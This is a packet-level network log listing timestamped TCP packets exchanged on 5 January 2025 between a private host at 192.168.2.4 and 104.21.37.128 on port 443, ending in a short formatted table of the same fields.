                                                                                                                                                                                                Jan 5, 2025 18:02:33.117796898 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.117846012 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.117918968 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.118012905 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.118016958 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.118077993 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.118135929 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137821913 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137828112 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137837887 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137857914 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137880087 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137892008 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137917995 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137937069 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137952089 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.137975931 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.138031006 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.138109922 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.138192892 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.212542057 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.212553978 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.212577105 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.212603092 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.212665081 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.212801933 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.212831974 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252105951 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252131939 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252173901 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252180099 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252235889 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252876043 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252897024 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252933025 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252938032 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252965927 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.252983093 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253716946 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253736973 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253776073 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253781080 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253814936 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253827095 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253838062 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253842115 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.253870010 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.254596949 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.254626989 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.254657030 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.254662991 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.254697084 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.255506039 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.255525112 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.255553007 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.255558014 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.255589962 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256350040 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256381035 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256422043 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256427050 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256459951 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256629944 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256649017 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256676912 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.256683111 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.519999027 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.520049095 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.520054102 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.520080090 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.520104885 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.573828936 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.601479053 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.601502895 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.601545095 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.601552010 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.601584911 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.601592064 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602190971 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602216005 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602251053 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602255106 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602277040 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602300882 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602976084 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.602996111 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603053093 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603060007 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603112936 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603404045 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603426933 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603456020 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603461027 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603492975 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.603502035 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.604458094 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.604475021 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.604509115 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.604513884 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.604542971 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.604568958 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.605092049 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.605112076 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.605144024 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.605148077 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.605175972 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.605186939 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.606093884 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.606111050 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.606133938 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.606137991 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.606168985 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.606189013 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.607018948 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.607044935 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.607074976 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.607079983 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.607109070 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.607127905 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.614833117 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.653669119 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688344955 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688364029 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688431978 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688441038 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688482046 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688894033 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688919067 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688944101 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688949108 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688977003 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.688986063 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.689485073 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.689502001 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.689553022 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.689558983 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.689596891 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690311909 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690332890 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690382957 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690387964 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690428972 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690788031 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690803051 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690840960 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690845966 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690871000 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.690886974 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.691643953 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.691663027 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.691719055 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.691729069 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.691770077 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.692627907 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.692641973 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693053007 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693063021 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693103075 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693397999 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693411112 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693473101 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693478107 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693528891 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.693593025 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775193930 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775223017 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775275946 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775285006 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775316954 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775346994 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775583029 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775595903 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775629044 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:33.775634050 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041117907 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041124105 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041160107 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041253090 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041281939 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041306973 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041311979 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041327953 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.041351080 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042082071 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042099953 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042131901 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042139053 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042165041 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042180061 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042656898 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042670965 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042725086 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042731047 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.042769909 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.043565989 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.043580055 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.043623924 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.043628931 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.043653011 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.043663979 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.044286966 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.044358969 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.044373035 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.044430017 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.044435978 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.044471979 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.047503948 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.077447891 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.077466965 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.077563047 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.077569962 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.077615023 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.125987053 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126008034 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126053095 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126061916 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126092911 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126101971 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126602888 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126624107 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126662016 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126666069 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126698017 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.126704931 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.127320051 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.127338886 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.127367973 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.127374887 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.127393961 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.127445936 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128005028 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128026009 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128056049 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128061056 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128086090 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128102064 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128262997 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128276110 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128305912 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128310919 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128336906 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.128350019 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129070044 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129127979 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129134893 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129162073 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129183054 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129199028 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129230022 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129235983 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.129278898 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.130048990 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.130065918 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.130122900 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.130130053 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.130156040 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.132642031 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.212738991 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.212774992 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.212840080 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.212853909 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213005066 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213005066 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213324070 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213346958 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213388920 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213397980 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213428974 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213443995 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213973999 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.213993073 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214060068 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214063883 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214082003 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214107037 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214557886 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214579105 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214611053 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214615107 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214629889 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.214653015 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:34.215553045 CET44349758104.21.37.128192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Jan 5, 2025 18:02:34.215570927 CET  443          49758      104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:34.215636015 CET  49758        443        192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:34.215641975 CET  443          49758      104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:34.215672016 CET  443          49758      104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:34.215682030 CET  49758        443        192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:34.215689898 CET  443          49758      104.21.37.128  192.168.2.4
